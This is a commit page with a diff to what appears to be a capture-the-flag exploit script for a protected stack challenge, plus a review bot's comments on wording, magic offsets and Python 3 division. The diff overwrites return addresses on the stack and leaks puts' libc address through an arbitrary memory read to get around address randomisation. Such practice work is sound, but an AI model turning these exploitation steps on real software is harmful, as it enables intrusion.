Fixed full-protection/stack

This commit is contained in:
2021-09-17 14:50:20 +08:00
parent 34783fa88d
commit 83d01532b8


@@ -61,6 +61,10 @@ print("puts GOT: %s" % hex(puts_got))
# Cannot use puts PLT to leak puts GOT there at return of main # Cannot use puts PLT to leak puts GOT there at return of main
# because PIE mode PLT use EBX to store offset but when returning EBX is null # because PIE mode PLT use EBX to store offset but when returning EBX is null
# A unified shift was applied to original shift to use in main's stack frame
# Because of the compiler's alignment
unified_shift = 4
# Write main retaddr at shift 89 to call puts # Write main retaddr at shift 89 to call puts
write_stack(p, 89 + unified_shift, puts_got) write_stack(p, 89 + unified_shift, puts_got)
# Write retaddr of puts at shift 90 back to main # Write retaddr of puts at shift 90 back to main
@@ -71,7 +75,7 @@ execute(p)
puts_libc = u32(p.recv(4)) puts_libc = u32(p.recv(4))
""" """
# Leask puts_got by using a # Leak puts_got by using a arbitary memory read
puts_libc = read_stack(p, (puts_got - user_stack_base) / 4) puts_libc = read_stack(p, (puts_got - user_stack_base) / 4)
print("puts libc: %s" % hex(puts_libc)) print("puts libc: %s" % hex(puts_libc))
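Review bot: The new comment in the second hunk, `# Leak puts_got by using a arbitary memory read`, has a spelling slip and mismatches the line below it, which reads the libc address of puts into `puts_libc` rather than leaking `puts_got`; `# Leak puts's libc address through an arbitrary stack-relative read` would describe the code. In the first hunk, `unified_shift = 4` is explained only as "compiler's alignment", while `89` and `90` in the `write_stack` calls remain unexplained magic numbers; a short comment on how these slot indices were derived, or named constants such as `MAIN_RETADDR_SLOT = 89`, would help the next reader. The index expression `(puts_got - user_stack_base) / 4` evaluates to a float under Python 3, so if the script is run there and `read_stack` expects an integer slot, `//` is the safer operator — `read_stack` is defined outside this hunk, so I cannot confirm what it accepts. The second hunk appears to continue past the visible end of the page.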